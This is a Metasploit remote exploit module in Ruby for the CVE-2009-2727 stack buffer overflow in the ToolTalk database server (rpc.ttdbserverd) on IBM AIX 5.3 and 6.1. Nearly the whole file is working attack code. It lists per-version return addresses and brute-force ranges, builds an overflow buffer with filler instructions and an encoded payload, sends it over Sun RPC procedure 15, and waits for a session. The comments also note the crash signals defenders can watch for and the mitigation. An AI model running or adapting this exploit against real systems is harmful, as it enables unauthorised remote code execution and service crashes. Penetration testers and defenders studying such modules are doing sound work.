##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Remote exploit module for the ToolTalk database server (rpc.ttdbserverd)
# stack buffer overflow tracked as CVE-2009-2727 (see 'References').
#
# The Msf::Exploit::Brute mixin supplies the exploit loop: it walks the
# per-target 'Bruteforce' range (Start..Stop in increments of Step) and calls
# #brute_exploit once per candidate value, so this class only has to build and
# send a single attempt.  Defender-relevant metadata lives in 'Notes': a failed
# attempt crashes the service (which restarts) and leaves entries in logs, so
# repeated crashes/restarts of rpc.ttdbserverd are the observable signal.
# Mitigation is the vendor fix for CVE-2009-2727 or removing/restricting the
# ToolTalk database server.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::SunRPC
  include Msf::Exploit::Brute

  # Registers module metadata.
  #
  # Target table keys, as consumed by #brute_exploit:
  #   'Ret'        - default candidate address; the brute-force loop overrides it
  #                  via brute_target['Ret'].
  #   'Addr1'      - address repeated in the padding ahead of the candidate.
  #   'AIX'        - AIX version string copied into datastore['AIX'] before the
  #                  payload is regenerated.
  #   'Bruteforce' - Start/Stop/Step range walked by Msf::Exploit::Brute.
  # The two "Debug" targets use recognisable marker values (0xaabbccdd /
  # 0xddccbbaa) and equal Start and Stop, so the range collapses to a single
  # attempt.
  #
  # @param info [Hash] metadata overrides merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)',
        'Description' => %q{
          This module exploits a buffer overflow vulnerability in _tt_internal_realpath
          function of the ToolTalk database server (rpc.ttdbserverd).
        },
        'Author' => [
          'Ramon de C Valle',
          'Adriano Lima <adriano[at]risesecurity.org>',
        ],
        'References' => [
          [ 'CVE', '2009-2727'],
          [ 'OSVDB', '55151' ]
        ],
        'Payload' => {
          # NUL terminates the C string being overflowed, so the payload encoder
          # must avoid it.
          'BadChars' => "\x00"
        },
        'Targets' => [
          [
            'IBM AIX Version 6.1.4',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'Ret' => 0x20099430 + 4096,
              'Addr1' => 0x2ff1ff50 - 8192,
              'AIX' => '6.1.4',
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x20099430 - 8192 },
                'Stop' => { 'Ret' => 0x20099430 + 8192 },
                'Step' => 1024
              }
            }
          ],
          [
            'IBM AIX Version 6.1.3',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'Ret' => 0x20099280 + 4096,
              'Addr1' => 0x2ff1ffd0 - 8192,
              'AIX' => '6.1.3',
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x20099280 - 8192 },
                'Stop' => { 'Ret' => 0x20099280 + 8192 },
                'Step' => 1024
              }
            }
          ],
          [
            'IBM AIX Version 6.1.2',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'Ret' => 0x20099280 + 4096,
              'Addr1' => 0x2ff1ffd0 - 8192,
              'AIX' => '6.1.2',
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x20099280 - 8192 },
                'Stop' => { 'Ret' => 0x20099280 + 8192 },
                'Step' => 1024
              }
            }
          ],
          [
            'IBM AIX Version 6.1.1',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'Ret' => 0x20099280 + 4096,
              'Addr1' => 0x2ff1ffd0 - 8192,
              'AIX' => '6.1.1',
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x20099280 - 8192 },
                'Stop' => { 'Ret' => 0x20099280 + 8192 },
                'Step' => 1024
              }
            }
          ],
          [
            'IBM AIX Version 6.1.0',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'Ret' => 0x20099280 + 4096,
              'Addr1' => 0x2ff1ffd0 - 8192,
              'AIX' => '6.1.0',
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x20099280 - 8192 },
                'Stop' => { 'Ret' => 0x20099280 + 8192 },
                'Step' => 1024
              }
            }
          ],
          # Combined 5.3.x target: note it pins 'AIX' to '5.3.9' regardless of
          # which of the four listed versions is actually present.
          [
            'IBM AIX Version 5.3.10 5.3.9 5.3.8 5.3.7',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'Ret' => 0x20096ba0 + 4096,
              'Addr1' => 0x2ff1ff14 - 8192,
              'AIX' => '5.3.9',
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x20096ba0 - 8192 },
                'Stop' => { 'Ret' => 0x20096ba0 + 8192 },
                'Step' => 1024
              }
            }
          ],
          [
            'IBM AIX Version 5.3.10',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'Ret' => 0x20096bf0 + 4096,
              'Addr1' => 0x2ff1ff14 - 8192,
              'AIX' => '5.3.10',
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x20096bf0 - 8192 },
                'Stop' => { 'Ret' => 0x20096bf0 + 8192 },
                'Step' => 1024
              }
            }
          ],
          [
            'IBM AIX Version 5.3.9',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'Ret' => 0x20096ba0 + 4096,
              'Addr1' => 0x2ff1ff14 - 8192,
              'AIX' => '5.3.9',
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x20096ba0 - 8192 },
                'Stop' => { 'Ret' => 0x20096ba0 + 8192 },
                'Step' => 1024
              }
            }
          ],
          [
            'IBM AIX Version 5.3.8',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'Ret' => 0x20096c10 + 4096,
              'Addr1' => 0x2ff1ff98 - 8192,
              'AIX' => '5.3.8',
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x20096c10 - 8192 },
                'Stop' => { 'Ret' => 0x20096c10 + 8192 },
                'Step' => 1024
              }
            }
          ],
          [
            'IBM AIX Version 5.3.7',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'Ret' => 0x20096c10 + 4096,
              'Addr1' => 0x2ff1ff98 - 8192,
              'AIX' => '5.3.7',
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x20096c10 - 8192 },
                'Stop' => { 'Ret' => 0x20096c10 + 8192 },
                'Step' => 1024
              }
            }
          ],
          # Debug targets: marker addresses, single attempt (Start == Stop).
          [
            'Debug IBM AIX Version 6.1',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'Ret' => 0xaabbccdd,
              'Addr1' => 0xddccbbaa,
              'AIX' => '6.1.4',
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0xaabbccdd },
                'Stop' => { 'Ret' => 0xaabbccdd },
                'Step' => 1024
              }
            }
          ],
          [
            'Debug IBM AIX Version 5.3',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'Ret' => 0xaabbccdd,
              'Addr1' => 0xddccbbaa,
              'AIX' => '5.3.10',
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0xaabbccdd },
                'Stop' => { 'Ret' => 0xaabbccdd },
                'Step' => 1024
              }
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2009-06-17',
        # Operational footprint: every unsuccessful attempt crashes the service
        # (it restarts) and the traffic/crash is recorded in logs.
        'Notes' => {
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability' => [ CRASH_SERVICE_RESTARTS ],
          'SideEffects' => [ IOC_IN_LOGS ]
        }
      )
    )
  end

  # One brute-force attempt, invoked by Msf::Exploit::Brute for each candidate.
  #
  # @param brute_target [Hash] the current candidate; only 'Ret' is read here
  # @return [void]
  def brute_exploit(brute_target)
    # Generate the encoded payload once and reuse it across the whole range.
    # datastore['AIX'] is set from the target first; presumably the AIX payload
    # stages read it to pick version-specific values - confirm against the
    # payload modules.
    if !@aixpayload
      datastore['AIX'] = target['AIX']
      @aixpayload = regenerate_payload.encoded
    end

    print_status('Trying to exploit rpc.ttdbserverd with address 0x%08x...' % brute_target['Ret'])

    begin
      # ToolTalk database server: RPC program 100083, version 1, over TCP.
      sunrpc_create('tcp', 100083, 1)

      # Request body layout (exact sizes matter; do not reorder):
      #   leading alignment bytes, 1 for 6.x targets, 2 for 5.3 targets
      if target['AIX'] =~ /6\./
        buf = 'A'
      else
        buf = 'AA'
      end

      #   Addr1 repeated 1030 times, then the candidate address repeated 32 times
      buf << [target['Addr1']].pack('N') * (1022 + 8)
      buf << [brute_target['Ret']].pack('N') * 32

      #   trailing alignment bytes, again version dependent
      if target['AIX'] =~ /6\./
        buf << 'AAA'
      else
        buf << 'AA'
      end

      #   a fixed 4-byte PPC instruction repeated 1920 times as filler, then the
      #   encoded payload
      buf << "\x7f\xff\xfb\x78" * 1920
      buf << @aixpayload
      # Wrap as XDR: the string followed by two integer pairs, forming the
      # argument body for procedure 15.  The meaning of the integer fields to
      # ttdbserverd is not documented here.
      buf = Rex::Encoder::XDR.encode(buf, 2, 0x78000000, 2, 0x78000000)

      print_status('Sending procedure 15 call message...')
      sunrpc_call(15, buf)

      sunrpc_destroy
      # Hand off to the payload handler to pick up a session, if any.
      handler
    # A timeout or a closed connection is the expected outcome of a wrong
    # candidate; both are swallowed so the Brute loop proceeds to the next one.
    # NOTE(review): sunrpc_destroy is not reached on these paths, so the RPC
    # connection is not explicitly torn down before the next attempt.
    rescue Rex::Proto::SunRPC::RPCTimeout
      # print_error('RPCTimeout')
    rescue EOFError
      # print_error('EOFError')
    end
  end
end